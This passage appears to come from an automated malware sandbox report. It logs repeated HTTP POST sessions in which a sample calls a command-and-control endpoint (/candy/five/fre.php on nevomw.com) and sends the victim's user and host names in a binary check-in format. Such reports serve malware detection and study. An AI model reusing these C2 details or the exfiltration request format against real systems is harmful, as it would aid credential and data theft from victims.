                                            234 | 192.168.2.6 | 49984 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:29.481369019 CET | 1679 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:29.534396887 CET | 1680 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:29.611299992 CET | 1680 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:29 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            235 | 192.168.2.6 | 49985 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:29.882165909 CET | 1681 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:29.941138983 CET | 1681 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:30.031088114 CET | 1681 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:30 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            236 | 192.168.2.6 | 49986 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:30.266581059 CET | 1682 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:30.319520950 CET | 1683 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:30.405565977 CET | 1683 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:30 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            237 | 192.168.2.6 | 49987 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:30.691282034 CET | 1684 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:30.743802071 CET | 1684 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:30.819380999 CET | 1684 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:30 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            238 | 192.168.2.6 | 49988 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:31.074450016 CET | 1685 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:31.137681007 CET | 1686 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:31.217477083 CET | 1686 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:31 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            239 | 192.168.2.6 | 49989 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:31.527811050 CET | 1687 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:31.580452919 CET | 1687 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:31.656363010 CET | 1687 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:31 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            24 | 192.168.2.6 | 49740 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:53.327474117 CET | 166 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:53.382477999 CET | 166 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:53.459325075 CET | 167 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:53 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            240 | 192.168.2.6 | 49990 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:31.972079992 CET | 1688 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:32.023840904 CET | 1688 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:32.100903034 CET | 1689 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:32 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            241 | 192.168.2.6 | 49991 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:32.430896997 CET | 1690 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:32.483166933 CET | 1690 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:32.565126896 CET | 1690 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:32 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            242 | 192.168.2.6 | 49992 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:32.886878967 CET | 1691 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:32.939291000 CET | 1691 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:33.011949062 CET | 1692 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:32 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            243 | 192.168.2.6 | 49993 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:33.320496082 CET | 1693 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:33.374996901 CET | 1693 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:33.450376034 CET | 1693 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:33 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            244 | 192.168.2.6 | 49994 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:33.753309965 CET | 1694 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:33.805074930 CET | 1694 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:33.881656885 CET | 1695 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:33 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            25 | 192.168.2.6 | 49741 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:53.777770042 CET | 167 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:53.830080032 CET | 168 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:53.903446913 CET | 168 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:53 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            26 | 192.168.2.6 | 49742 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:54.204572916 CET | 169 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:54.261811972 CET | 169 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:54.341794968 CET | 170 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:54 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            27 | 192.168.2.6 | 49743 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:54.660317898 CET | 171 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:54.712184906 CET | 171 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:54.786220074 CET | 171 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:54 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            28 | 192.168.2.6 | 49744 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:55.114402056 CET | 172 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:55.168152094 CET | 172 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:55.244730949 CET | 173 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:55 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            29 | 192.168.2.6 | 49745 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:55.544487000 CET | 173 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:55.596440077 CET | 174 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:55.674252987 CET | 174 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:55 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            3 | 192.168.2.6 | 49715 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:42.691672087 CET | 61 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:42.744729996 CET | 61 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:42.818738937 CET | 62 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:42 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            30 | 192.168.2.6 | 49746 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
